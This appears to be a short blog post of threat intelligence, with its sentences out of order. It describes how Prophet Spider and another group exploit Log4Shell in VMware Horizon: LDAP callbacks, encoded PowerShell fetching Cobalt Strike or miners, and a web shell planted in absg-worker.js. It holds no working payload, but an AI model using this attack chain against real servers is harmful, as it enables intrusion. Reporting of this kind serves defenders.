![]() Post exploitation, the threat actors use encoded PowerShell commands to download a second-stage payload (such as Cobalt Strike beacons, Crypto miner or ransomware) to the victim systems.This enables an attacker to establish a stealthy persistence method.The ‘VMBLastSG’ service is forcibly restarted to initiate the listener using Blast Secure Gateway for any IP address on port 8443.The malicious Java class attempts to exploit the ws_TomcatService.exe process to spawn either cmd.exe or powershell.exe as child processes, further injecting a web shell to absg-worker.js.The attack exploits the Log4Shell vulnerability in the Apache Tomcat service, which is embedded within VMware Horizon, resulting in the Horizon server calling back over LDAP protocol and loading malicious Java class. ![]() In ongoing threat campaigns, the attackers attempt to initiate the attack via Log4Shell payload similar to $ targeting vulnerable VMware Horizon servers.Initial Access Broker (IAB) group Prophet Spider and an unknown threat group are actively attempting to exploit the Log4j vulnerability in VMware Horizon. ![]()
0 Comments
Leave a Reply. |
AuthorWrite something about yourself. No need to be fancy, just an overview. ArchivesCategories |